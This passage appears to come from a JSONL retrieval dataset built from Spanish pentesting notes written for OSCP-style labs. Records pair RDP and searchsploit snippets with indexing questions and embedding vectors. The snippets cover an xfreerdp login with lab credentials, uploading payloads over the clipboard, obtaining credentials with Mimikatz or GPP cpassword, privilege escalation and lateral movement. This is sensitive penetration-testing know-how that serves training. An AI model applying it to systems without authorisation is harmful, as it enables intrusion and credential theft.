pegar texto desde una terminal a Windows remoto?", "v": [0.03321, 0.02677, -0.1079, -0.25396, 0.10939, -0.11196, 0.04222, -0.00352, 0.00477, -0.02407, -0.03219, -0.06868, 0.06892, -0.04188, 0.046, 0.07868, -0.01189, -0.00776, 0.15685, 0.06232, 0.04361, -0.01172, -0.00709, -0.02992, 0.03059, 0.03211, 0.06195, -0.03693, -0.09872, -0.08462, 0.04099, -0.08888, 0.11868, -0.13098, -0.06326, -0.02441, 0.02307, 0.08661, 0.0318, 0.04529, 0.11423, 0.0935, -0.15786, 0.05507, 0.03609, -0.07473, 0.11341, -0.0372, 0.07166, -0.02532, 0.02236, -0.00966, -0.0492, -0.03775, -0.05086, 0.01761, 0.2247, -0.09679, 0.04293, 0.05161, -0.0093, 0.11535, -0.0391, 0.0191, 0.03192, 0.00218, 0.03393, 0.00239, -0.10106, 0.12713, -0.04593, 0.06738, 0.06778, 0.06126, 0.01351, 0.02617, -0.20132, -0.08925, 0.1299, -0.00137, -0.02298, -0.02445, -0.00706, -0.01468, -0.03854, -0.14845, -0.01735, 0.08007, -0.02289, -0.0271, 0.12714, -0.04644, 0.01894, 0.08433, -0.01482, -0.14537, -0.00904, -0.00903, 0.00558, 0.07677, 0.02469, -0.03668, -0.05357, 0.08674, -0.05663, 0.0655, 0.02911, -0.06502, -0.0765, -0.02103, 0.03076, 0.01094, -0.00965, -0.00407, -0.13086, -0.04223, 0.01371, -0.01483, 0.03366, -0.028, -0.1132, 0.04603, -0.07404, -0.00403, 0.08141, -0.06239, -0.01518, 0.14847, -0.06486, 0.0172, 0.03751, 0.03988, -0.01595, -0.05106, -0.07021, -0.02772, -0.01933, -0.03564, 0.00934, -0.1018, -0.02354, 0.10386, -0.00391, 0.04016, 0.01529, 0.02536, 0.01612, 0.00923, -0.03143, -0.02792, 0.00997, -0.02465, -0.05128, -0.0119, -0.07074, 0.02457, 0.03674, 0.03612, -0.09076, 0.074, -0.03423, -0.04613, -0.05661, -0.06905, 0.0778, -0.0172, -0.06222, -0.03884, 0.11623, 0.03638, -0.0666, 0.06474, -0.02153, -0.02809, 0.0148, 0.01497, 0.06313, -0.00562, -0.01847, -0.03073, -0.13242, 0.06745, 0.04138, 0.00022, 0.02906, 0.00276, -0.02539, 0.08103, -0.02491, -0.00439, 0.00469, 0.01495, 0.01272, 0.00907, 0.01421, -0.03518, -0.03956, -0.00396, 0.06633, 0.0188, -0.08511, -0.02865, 0.01856, -0.06323, 0.11813, 0.03516, -0.07494, 0.05196, 0.03147, 0.1168, -0.03559, 0.01407, 0.0321, 0.00588, -0.00135, -0.07857, -0.0237, 0.01364, 0.04831, 0.01844, 0.02508, -0.01348, 0.07201, 0.0513, 0.01015, -0.04706, 0.00351, 0.07478, 0.00794, -0.00417, 0.01516, 0.02749, 0.00334, -0.01399, 0.04095, -0.03436, 0.00015, -0.04764, -0.03989, -0.06852, -0.04615, 0.07537, -0.02571, -0.08538, -0.06121, -0.00232, -0.07775, 0.03879, 0.0039, -0.03233, -0.05408, 0.0052, 0.05589, -0.05667, -0.00475, 0.05283]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "cual es la herramienta para conectarse al escritorio de un ordenador con credenciales sin reverse shell?", "v": [0.1031, 0.01396, -0.04626, -0.15187, 0.09198, -0.16558, -0.13226, -0.01546, 0.06324, -0.03166, -0.13203, -0.00555, -0.12306, -0.10767, 0.10092, 0.03895, -0.01908, -0.04908, 0.0125, -0.0042, 0.0233, -0.00527, -0.0885, -0.03193, -0.03864, 0.05311, 0.00311, 0.06712, -0.07934, -0.01949, -0.04845, -0.05491, 0.07607, -0.06655, -0.03222, 0.01611, -0.02759, 0.07841, 0.03468, 0.13167, 0.03458, 0.0882, -0.03585, 0.19416, 0.10845, -0.02613, 0.04826, -0.02677, 0.00626, 0.03886, -0.122, -0.1974, -0.14815, -0.01004, 0.04746, -0.09921, 0.22544, -0.07511, 0.12072, -0.15472, -0.13685, 0.15275, -0.04112, -0.03263, -0.01023, 0.00189, -0.07432, -0.09874, -0.1104, 0.07382, -0.03349, 0.02333, 0.04398, -0.05245, -0.03455, 0.00632, 0.03534, -0.0006, 0.11982, 0.0581, 0.02312, -0.07888, -0.04025, -0.00902, -0.06697, -0.11525, 0.03091, -0.03167, 0.00025, 0.01489, 0.03262, 0.09188, -0.08557, 0.01073, 0.0457, -0.04271, 0.00115, -0.02168, -0.11035, 0.00119, 0.10429, -0.02388, -0.03641, 0.18297, -0.08896, 0.03102, -0.08606, 0.03055, -0.03122, 0.00975, 0.08782, 0.00952, 0.02207, 0.04653, -0.03197, 0.01366, 0.02672, -0.05958, -0.01175, -0.08007, 0.0472, -0.0009, -0.02207, 0.01064, -0.06147, 0.06808, -0.02485, 0.0795, -0.02295, -0.04934, 0.02245, -0.08021, -0.03659, -0.00354, -0.06592, 0.0163, -0.01681, -0.16442, -0.01113, -0.07419, 0.04761, 0.09261, -0.03931, -0.09726, -0.00985, 0.03483, 0.06586, -0.03334, -0.07914, -0.03436, 0.0357, 0.0568, 0.01059, 0.00938, -0.02305, 0.00074, 0.01405, 0.09199, -0.0685, -0.00426, -0.078, -0.01342, 0.10876, 0.05852, -0.03275, -0.04454, -0.04778, 0.01485, 0.06861, 0.04739, -0.05653, -0.00793, 0.04304, -0.01978, -0.01013, -0.0443, -0.01818, 0.02372, -0.00855, -0.04211, 0.0016, 0.02528, -0.01155, -0.04182, -0.03458, 0.03994, -0.00162, 0.03722, -0.03329, 0.01768, 0.01194, 0.00645, -0.00197, -0.04717, 0.08689, 0.02284, -0.01151, -0.07398, 0.08521, 0.02432, -0.07286, 0.00147, -0.05326, -0.03447, 0.05261, 0.09319, -0.03127, -0.02197, -0.03148, 0.03066, 0.00593, -0.03038, 0.02401, 0.03711, -0.02406, -0.0579, 0.02677, -0.03421, -0.00835, 0.02052, 0.06302, -0.04195, 0.00535, 0.02437, 0.00924, -0.06579, 0.00997, 0.01463, -0.00091, -0.05288, -0.00701, -0.02362, -0.00387, 0.00646, -0.0287, 0.00373, 0.02791, -0.02863, -0.04822, 0.02394, -0.04776, 0.07185, 0.04037, -0.06118, -0.05305, 0.01506, -0.04878, -0.02911, -0.0443, -0.05067, -0.02694, 0.00184, 0.02979, -0.03566, 0.01005, -0.00685]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "con que puedo acceder remotamente a un sistema windows usando mi cuenta de estudiante?", "v": [0.09601, 0.11902, -0.1785, -0.14101, 0.02519, -0.03757, -0.16968, -0.05648, -0.06027, -0.14685, -0.13105, -0.15448, 0.02465, 0.02874, 0.02168, -0.03408, 0.08539, 0.01198, 0.04124, -0.0413, 0.00608, -0.10588, 0.02421, 0.02655, -0.06656, 0.05835, 0.04236, -0.03572, -0.00682, -0.01339, 0.03162, -0.0187, 0.03178, -0.13178, -0.05469, -0.02067, -0.00534, 0.16189, 0.07765, 0.03127, 0.12865, 0.10816, -0.06361, 0.00522, 0.17913, 0.01028, 0.01993, -0.00478, -0.08858, 0.003, -0.1071, -0.01834, -0.13804, -0.02648, 0.04837, -0.04452, 0.15158, -0.02743, 0.04521, 0.03016, 0.05121, 0.04678, -0.00117, 0.01973, 0.05968, -0.07797, 0.08564, -0.01413, -0.05526, 0.12792, -0.05272, -0.06402, 0.06847, -0.04597, -0.03926, 0.10474, -0.06844, -0.07564, 0.16848, -0.0594, -0.00868, 0.01934, -0.15927, -0.03963, 0.00535, -0.1472, -0.01852, -0.02079, 0.06856, -0.00083, 0.02712, -0.02383, -0.08217, 0.11396, 0.08427, -0.07238, -0.04342, -0.00942, -0.10098, -0.08225, 0.0238, -0.02267, -0.00472, 0.10539, -0.07482, 0.01463, 0.01466, -0.05783, -0.08547, -0.02697, 0.02136, 0.02343, -0.07838, -0.11041, -0.1057, -0.01946, -0.08445, -0.01471, -0.02385, 0.01171, -0.0284, -0.02116, -0.03003, 0.01317, 0.07982, 0.01006, -0.01087, 0.05266, -0.01523, 0.04565, 0.02657, -0.00783, -0.04218, -0.07939, 0.0204, -0.03819, -0.08567, -0.07056, 0.02413, -0.00451, 0.03706, 0.10362, -0.00139, -0.03524, 0.06917, 0.01101, 0.05972, -0.063, -0.08632, -0.06384, -0.0595, -0.06219, -0.04911, 0.0217, -0.05826, -0.0169, 0.02235, -0.05076, 0.03638, -0.01426, -0.02017, 0.0528, 0.03313, -0.00401, -0.04603, -0.0554, -0.03991, -0.03886, 0.06336, 0.04177, -0.08391, 0.04881, 0.03199, -0.00644, 0.01098, -0.06972, 0.0497, -0.11333, -0.06153, 0.00735, -0.10694, 0.07624, -0.03475, -0.03816, -0.00627, 0.03652, -0.02861, 0.01943, 0.02114, 0.04198, -0.00607, 0.05373, -0.01074, 0.00276, -0.00166, 0.01994, -0.09071, -0.07126, 0.0443, 0.00308, -0.05251, 0.06792, 0.0064, -0.08828, 0.08246, 0.03707, -0.03347, 0.06949, 0.01586, 0.06493, 0.0241, -0.00437, 0.06809, -0.03455, -0.01555, -0.04419, 0.08313, -0.01699, -0.0349, -0.03263, 0.02792, 0.0314, 0.04715, 0.07004, 0.0215, 0.01419, -0.02516, 0.00885, -0.05109, -0.02912, -0.02186, -0.00669, -0.00199, -0.03361, 0.03277, -0.0315, -0.03547, -0.02977, -0.06666, -0.01637, 0.03115, 0.09032, -0.01988, -0.0482, -0.06445, -0.01179, -0.08133, 0.01419, -0.00761, -0.13266, -0.01883, 0.01033, 0.02165, -0.02003, 0.01293, 0.03565]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "quΓ© herramienta me ayuda a obtener privilegios en Windows si ya tengo credenciales vΓ‘lidas?", "v": [-0.01208, 0.13831, -0.14805, -0.05485, 0.13584, 0.00055, -0.02752, -0.0838, -0.03931, -0.16783, -0.03797, -0.0698, -0.04186, -0.08682, 0.00628, 0.08063, 0.05758, -0.08322, 0.08642, 0.04904, 0.04714, -0.1552, -0.22565, -0.0448, -0.08488, -0.02418, 0.06192, -0.01864, -0.10136, 0.10868, 0.0769, -0.02095, -0.07445, -0.02815, -0.0513, 0.08022, -0.11324, 0.13621, 0.02489, 0.0712, 0.02385, 0.08445, 0.07624, 0.02883, 0.09097, -0.08858, -0.05351, 0.06639, -0.01693, 0.01797, -0.01783, -0.20031, -0.08481, -0.15036, 0.03974, -0.10677, 0.16826, -0.0556, -0.01889, -0.06243, -0.10747, 0.05102, -0.00556, 0.07528, 0.02141, -0.02863, 0.07178, -0.12993, -0.00265, 0.12907, -0.13886, -0.03411, 0.08348, -0.03815, 0.00357, -0.08907, -0.01823, -0.03838, 0.09674, -0.03232, 0.15883, 0.05824, -0.00415, -0.05103, 0.01818, -0.14043, -0.02333, 0.0102, 0.01219, -0.10292, 0.04798, 0.00334, -0.06188, -0.00689, 0.01903, -0.02365, -0.03966, -0.00392, -0.00071, 0.03576, 0.08404, -0.16538, -0.07819, 0.07795, -0.00647, 0.04622, -0.04314, -0.10846, -0.13262, -0.01881, 0.04598, 0.08316, -0.00398, 0.06355, -0.038, 0.14552, 0.01396, -0.07299, -0.01207, -0.04131, 0.01814, 0.00116, -0.02256, -0.01711, 0.02915, -0.01105, -0.06804, 0.09799, -0.07478, -0.02088, -0.0505, -0.05509, -0.05063, -0.0303, -0.00772, 0.00303, 0.01399, -0.09947, -0.03086, -0.05507, 0.08019, -0.01848, -0.00167, -0.10017, 0.01215, 0.0106, 0.01574, -0.00599, -0.03057, -0.08674, 0.02675, -0.06382, 0.01984, 0.01921, -0.04147, 0.00787, 0.02086, 0.07872, -0.01171, -0.00295, -0.0276, -0.05392, 0.01586, -0.02373, 0.01788, -0.03994, 0.03599, -0.00274, 0.00492, 0.02283, -0.00589, 1e-05, -0.03914, -0.00777, -0.00939, -0.05068, 0.00245, 0.03451, -0.06242, -0.05638, -0.04928, 0.04413, 0.03321, -0.00807, -0.02418, 0.00553, -0.03291, 0.02013, -0.00028, 0.03527, -0.00815, -0.01968, 0.0681, -0.05027, 0.02281, -0.00054, -0.045, -0.03991, 0.04763, 0.00989, -0.08505, -0.03693, -0.0096, -0.06289, 0.08641, 0.05468, -0.02582, -0.00445, 0.02016, 0.0636, 0.04833, 0.01355, 0.02295, -0.04418, -0.00858, -0.00775, 0.03888, 0.03976, -0.03673, -0.0841, 0.02879, -0.00965, 0.05153, 0.0479, 0.00966, 0.00569, -0.02131, 0.02591, -0.00667, 0.03945, 0.05225, -0.05858, 0.02542, -0.03291, 0.04218, -0.02997, 0.04872, -0.0223, -0.02357, 0.00113, -0.02233, 0.03728, 0.0149, -0.04571, -0.03345, -0.01248, 0.00293, -0.03912, -0.04071, -0.0518, 0.03223, -0.00989, 0.05374, -0.08739, 0.04321, 0.0389]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "con quΓ© programa puedo montar un ataque de movimiento lateral por RDP de forma cΓ³moda?", "v": [-0.02295, 0.048, -0.18273, -0.20657, -0.18022, 0.06077, 0.05338, 0.16456, -0.15563, -0.01704, 0.01974, -0.10289, 0.03664, -0.14414, 0.03858, -0.01643, 0.05968, 0.01741, -0.01264, -0.05684, -0.02739, -0.0988, 0.01356, -0.04086, 0.13939, 0.06366, 0.06033, 0.07324, -0.04982, -0.09989, 0.03773, 0.01817, 0.01638, -0.04358, -0.00423, -0.10457, 0.08501, 0.02623, 0.08909, -0.01124, -0.10503, -0.06526, -0.07943, 0.00646, 0.07524, 0.04978, 0.00299, -0.01966, -0.00822, -0.0136, 0.12245, 0.1709, -0.05203, -0.07095, -0.00907, -0.06066, 0.10966, -0.08287, 0.08238, 0.01926, 0.0294, 0.14471, -0.061, -0.01643, 0.04324, -0.06893, 0.01032, -0.06792, -0.08263, -0.05631, -0.00736, -0.07044, -0.05705, 0.04408, -0.01415, 0.05773, -0.00424, 0.01049, 0.06465, 0.03993, -0.02021, 0.04971, -0.10087, 0.11248, -0.0795, -0.07065, 0.07741, -0.09017, -0.03294, 0.00831, 0.06295, 0.01754, -0.00648, 0.05555, -0.06182, -0.0673, -0.03734, 0.06323, -0.03091, -0.01171, -0.02174, 0.01797, -0.11374, 0.04577, 0.07376, -0.05277, 0.03782, -0.03773, 0.02185, -0.01019, 0.02177, 0.01124, -0.12391, -0.03787, -0.00752, -0.06705, -0.14921, 0.03513, -0.03418, -0.0017, -0.01886, 0.06939, -0.0544, -0.04142, 0.04058, -0.01739, 0.03846, 0.02774, -0.13461, 0.0667, 0.07124, -0.00064, 0.00953, -0.04178, -0.08442, -0.03525, 0.03933, 0.02579, 0.07277, -0.04409, 0.06076, 0.06632, 0.04026, -0.01648, -0.0135, 0.03662, 0.07937, -0.04462, -0.06287, 0.0697, 0.01666, 0.04037, 0.05944, 0.00365, -0.04206, -0.01654, -0.01679, -0.02039, -0.08128, 0.09319, -0.05611, 0.09616, -0.12517, -0.04811, 0.05719, -0.10455, -0.00438, 0.01139, 0.10864, 0.04093, -0.03294, 0.06563, 0.05878, -0.03145, 0.01476, -0.00156, -0.09116, -0.06557, 0.08381, 0.01588, -0.05442, 0.04623, 0.03395, 0.01794, 0.03533, -0.03916, 0.05496, 0.04533, 0.0779, 0.0441, -0.04346, 0.05174, -0.01003, -0.00714, 0.00561, -0.09021, -0.04805, -0.00111, 0.06394, 0.03774, -0.07415, -0.05271, 0.02661, -0.00871, 0.05853, 0.05943, -0.05591, 0.083, 0.03452, 0.08282, 0.03779, -0.05926, 0.12757, -0.01622, -0.05801, -0.00674, -0.01527, 0.02568, 0.02693, 0.05168, 0.01065, -0.00179, 0.05478, 0.05622, -0.00419, -0.08309, 0.01026, 0.01486, 0.01947, 0.01009, 0.01003, -0.03727, 0.03094, -0.06231, 0.01657, -0.00449, 0.08101, 0.03287, -0.09049, -0.00582, 0.01959, 0.02464, -0.00234, -0.03659, -0.0006, -0.0401, -0.0627, 0.07771, 0.01993, -0.03636, -0.01469, 0.01555, -0.00754, -0.07884, 0.06808, 0.03391]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "necesito una guΓ­a para ejecutar PEASS-ng y privesc en Windows, ΒΏme recomiendas algo?", "v": [-0.03244, 0.08365, -0.1596, -0.02782, 0.18797, -0.03388, -0.01343, -0.12732, -0.06619, -0.18916, -0.01734, 0.01302, -0.10035, -0.0901, 0.0185, -0.03535, 0.0277, 0.07517, 0.13774, 0.14609, 0.01131, -0.07642, -0.19158, 0.06112, -0.05126, 0.13155, 0.12085, 0.02306, -0.13118, 0.01083, -0.10525, 0.00326, -0.09228, -0.15316, -0.0312, 0.03048, -0.06145, 0.03009, 0.02092, 0.13663, -0.03348, 0.1871, -0.12371, 0.13796, 0.01202, -0.06036, 0.02268, -0.01797, 0.03132, 0.03578, -0.07498, 0.01716, -0.05042, 0.03345, 0.03387, -0.01138, 0.08625, -0.02817, -0.05787, -0.04479, -0.01403, -0.01143, 0.09363, 0.00063, 0.00183, -0.04672, 0.0503, -0.04673, 0.06178, 0.08246, -0.0612, -0.00742, 0.08015, 0.08727, -0.0011, -0.02921, -0.03064, -0.00407, 0.13854, 0.01745, 0.09156, 0.09189, -0.00589, -0.02134, -0.02415, -0.07067, -0.01379, -0.03183, 0.04963, -0.10101, 0.04389, -0.09767, -0.0545, 0.08154, 0.00728, -0.00447, -0.04567, 0.05085, 0.06209, 0.10275, 0.00601, -0.20255, 0.04218, 0.1111, -0.00298, -0.03005, -0.02396, 0.00801, -0.09248, 0.00724, 0.05743, 0.07038, -0.0547, 0.01774, -0.00076, -0.05292, -0.05216, -0.06977, 0.05058, -0.018, -0.07358, -0.00772, -0.06046, -0.07331, -0.00783, -0.05073, -0.02956, 0.11008, 0.03636, 0.04297, 0.00965, -0.02385, 0.0073, -0.10289, -0.02339, 0.15276, 0.05377, -0.03294, -0.02247, -0.06807, 0.10427, -0.02025, -0.01005, 0.03377, 0.03839, -0.00418, 0.11278, 0.00481, 0.03805, 0.05523, 0.05631, -0.02047, -0.02289, 0.01844, 0.0315, 0.00637, 0.04202, 0.07765, 0.0353, -0.00074, 0.08962, 0.03524, 0.01985, -0.07397, -0.01112, -0.00437, 0.02522, 0.07665, -0.04906, -0.00957, 0.02871, 0.06966, -0.0635, -0.05661, 0.05187, -0.06687, 0.03945, 0.02527, -0.0581, 0.01772, -0.01894, 0.03155, 0.02728, 0.08842, -0.04179, 0.02388, -0.02003, -0.02905, -0.03924, 0.05451, -0.03933, -0.00359, 0.00169, -0.07208, 0.04593, -1e-05, 0.00516, -0.03676, -0.03888, -0.03071, -0.03739, -0.04932, -0.0829, -0.02958, 0.0751, 0.02133, -0.10722, 0.06338, -0.00412, 0.01201, 0.05189, -0.0518, 0.02015, -0.01118, -0.037, -0.03444, 0.03035, 0.05349, -0.0269, 0.03282, -0.01909, 0.06851, 0.04405, -0.01924, 0.04417, -0.0547, -0.03658, -0.03704, -0.01549, 0.01632, 0.00394, 0.00507, 0.02383, -0.01137, 0.05558, 0.03895, -0.01028, -0.05524, 0.00959, -0.01621, 0.03683, 0.074, 0.01241, -0.02385, -0.01779, -0.03898, 0.0075, 0.04827, -0.04945, -0.09276, 0.02494, -0.03288, 0.01766, -0.04796, 0.00531, 0.01167]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "quΓ© programa busca exploits localmente sin necesidad de internet?", "v": [0.07535, 0.15331, -0.08664, -0.09855, 0.05552, -0.08437, -0.00905, -0.05203, -0.09939, -0.00965, 0.06255, -0.01863, -0.03842, 0.01809, 0.00206, -0.0658, 0.03936, -0.08158, 0.1193, -0.07919, -0.09987, 0.03544, 0.01434, -0.00686, -0.08252, -0.02155, -0.02836, -0.03738, -0.02131, 0.0651, -0.10658, 0.07365, 0.03013, -0.03717, -0.0376, -0.02528, 0.10115, 0.06607, 0.07572, -0.02853, 0.11949, -0.01964, -0.16364, 0.01544, 0.07786, 0.03661, -0.03744, -0.06498, 0.00673, -0.03616, -0.02944, 0.04719, -0.10482, -0.07102, 0.11942, -0.02365, 0.02719, -0.18647, -0.00835, 0.04265, -0.13076, -0.07016, 0.03299, -0.04225, 0.05119, 0.04553, 0.11455, 0.03798, -0.09498, 0.13555, -0.0009, 0.01533, 0.02656, -0.02249, 0.04113, 0.00775, 0.00527, 0.00066, 0.00402, -0.05025, -0.03873, 0.00909, 0.01841, 0.03857, -0.17677, -0.03061, 0.10854, -0.08161, -0.04162, -0.09225, 0.05555, 0.10278, -0.03537, -0.0609, 0.05559, -0.09801, 0.17066, 0.01732, 0.04648, 0.11379, -0.078, -0.06586, -0.16322, 0.12046, 0.00497, 0.01453, 0.07317, 0.05977, -0.10205, -0.00645, 0.02859, -0.05246, 0.00563, -0.00312, -0.01311, -0.02199, 0.01926, -0.07611, 0.00933, -0.11434, -0.10737, 0.03378, -0.02514, -0.03676, 0.09234, 0.04023, 0.00251, 0.06204, 0.00122, -0.03785, 0.02756, -0.04125, 0.03144, -0.06097, -0.04511, -0.12345, 0.03836, -0.11309, 0.00463, -0.04571, 0.02785, -0.06783, -0.06445, 0.02279, 0.02889, 0.0279, 0.03995, -0.07012, -0.08426, -0.01954, -0.10183, 0.01405, -0.11134, 0.05001, -0.02348, 0.02083, -0.03511, -0.01988, -0.03362, 0.05417, -0.0192, -0.07216, 0.02564, -0.04161, -0.0104, 0.01902, -0.07847, 0.0715, 0.05345, 0.08326, -0.07118, 0.04611, -0.01923, -0.07811, -0.023, -0.00067, 0.0157, -0.02778, 0.02313, -0.00648, -0.08854, 0.03416, 0.07269, 0.07269, -0.08569, -0.02349, 0.01652, -0.01206, -0.00539, -0.04042, 0.07267, -0.07241, -0.02243, 0.12388, 0.0013, -0.01385, -0.03557, 0.02837, 0.09315, -0.07036, -0.1032, -0.0566, -0.03207, -0.02392, 0.01456, 0.08717, 0.02694, -0.0505, -0.00943, 0.11645, -0.02098, -0.05262, -0.0181, -0.06825, -0.03429, -0.05224, 0.05182, 0.00837, -0.05015, 0.03179, 0.02272, -0.03308, 0.02313, 0.07753, -0.01413, 0.00782, -0.0079, -0.01115, 0.02673, 0.00871, -0.05522, -0.05711, -0.06319, -0.07075, -0.00695, -0.02674, 0.01273, -0.02078, -0.04812, -0.02563, -0.08914, 0.09539, 0.00114, -0.02519, -0.00313, -0.04759, -0.1054, -0.00279, 0.03063, -0.00083, -0.0835, 0.03313, -0.01247, -0.0424, 0.07963, 0.04718]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "con quΓ© puedo copiar una lista de vulnerabilidades para usar offline?", "v": [0.09047, 0.15214, -0.15966, -0.01874, -0.0441, -0.13172, -0.03868, 0.0235, -0.06449, -0.12127, -0.03969, -0.22396, -0.03117, 0.03363, -0.06834, -0.06094, 0.06367, -0.07724, 0.02699, 0.02662, -0.01165, -0.03103, -0.09084, -0.06996, -0.04188, 0.08448, 0.0516, -0.00602, -0.12755, -0.06359, -0.06341, -0.04042, 0.09532, -0.00363, -0.0463, 0.03783, 0.04091, 0.02985, 0.02771, 0.02923, 0.13716, 0.13008, -0.13829, 0.0881, 0.01161, -0.01989, -0.10983, -0.01486, -0.04909, 0.06822, -0.10364, -0.0808, -0.16861, -0.04283, -0.04222, -0.09373, 0.1541, -0.13729, 0.09474, -0.00826, -0.14499, 0.02865, -0.04018, 0.00174, 0.02369, -0.04856, -0.02329, 0.03099, -0.22769, 0.12762, -0.00499, 0.06685, 0.02775, -0.03258, 0.03458, 0.04781, -0.02533, -0.06957, -0.01837, 0.07512, -0.04321, -0.02801, 0.06626, 0.04651, -0.12793, -0.11255, 0.06773, 0.02219, 0.01003, 0.00737, 0.05411, 0.04972, -0.04824, -0.10419, -0.02545, -0.12223, 0.01807, 0.03236, 0.00411, -0.00539, -0.01002, -0.00634, -0.01191, 0.08278, -0.03315, 0.04479, 0.01616, -0.02768, -0.04962, -0.07632, -0.01366, -0.03454, -0.12328, -0.00201, -0.04276, 0.04399, -0.02728, -0.00952, 0.04407, 0.00428, -0.05088, -0.01001, -0.01502, -0.05408, 0.07584, 0.06546, 0.01334, 0.09571, -0.0921, -0.08947, -0.03058, 0.01416, -0.04248, -0.04388, -0.03422, -0.00329, -0.01022, -0.05044, -0.00995, -0.04661, 0.00837, 0.01064, -0.07424, 0.01033, 0.01533, 0.0074, 0.07093, -0.0696, -0.10529, -0.03589, 0.03979, 0.01591, -0.07657, 0.00349, -0.01575, 0.0548, -0.01256, -0.0713, 0.02569, 0.06342, -0.03477, 0.03579, -0.01817, 0.04907, -0.00362, -0.04388, 0.06462, -0.00226, 0.06588, 0.05137, 0.05187, 0.11514, -0.00339, -0.13505, 0.02003, -0.08007, 0.02029, 0.00995, -0.03062, -0.03524, -0.04882, -0.00998, -0.01052, 0.03553, 0.03922, 0.00317, 0.04542, 0.01394, 0.0013, 0.07836, -0.07197, 0.03989, -0.00804, 0.05079, 0.06305, -0.02666, 0.06568, 0.02939, 0.00491, -0.08465, -0.07308, -0.08268, -0.06832, -0.05141, 0.10227, 0.01289, -0.05286, 0.00434, 0.00367, 0.0293, -0.02143, -0.03036, 0.09734, -0.0221, -0.01412, -0.02222, -0.06052, 0.0062, 0.01089, -0.0611, 0.0106, -0.00298, 0.03078, 0.02688, 0.05358, 0.0757, 0.0146, -0.04108, -0.01413, 0.01883, 0.02351, 0.01643, -0.03689, -0.05579, 0.01798, -0.05767, -0.01946, 0.03014, -0.07278, 0.00558, -0.01392, 0.06918, 0.01553, -0.02994, -0.05237, -0.02994, -0.07123, 0.03091, -0.04058, -0.11459, -0.06915, 0.03754, 0.06859, -0.03758, 0.00594, -0.01078]} +{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "ΒΏhay alguna herramienta que conecte Nmap con la explotaciΓ³n directamente en mi mΓ‘quina?", "v": [0.05858, 0.12874, -0.13961, -0.08896, -0.00503, -0.10228, -0.10672, 0.16031, -0.09097, -0.05495, -0.15732, -0.01166, 0.06588, 0.05291, 0.01113, 0.11193, 0.02291, -0.09494, -0.05063, -0.00222, -0.09349, 0.03564, -0.03266, 0.01076, -0.10548, 0.01872, 0.04938, -0.00216, -0.25592, 0.01966, -0.03506, 0.0939, 0.0492, -0.03066, -0.01163, -0.06076, 0.02359, -0.01456, 0.04167, -0.03063, -0.00986, -0.10766, -0.14432, 0.06322, 0.11435, -0.03594, -0.0364, -0.0554, -0.01652, 0.0294, -0.12116, -0.13088, -0.14965, -0.00208, -0.06098, -0.12348, 0.06935, 0.01883, 0.01652, 0.01159, -0.04955, -0.02465, -0.06139, -0.1125, -0.0218, -0.04072, 0.0614, -0.09517, -0.09264, 0.07255, -0.01874, 0.06489, -0.00145, 0.0321, 0.10808, 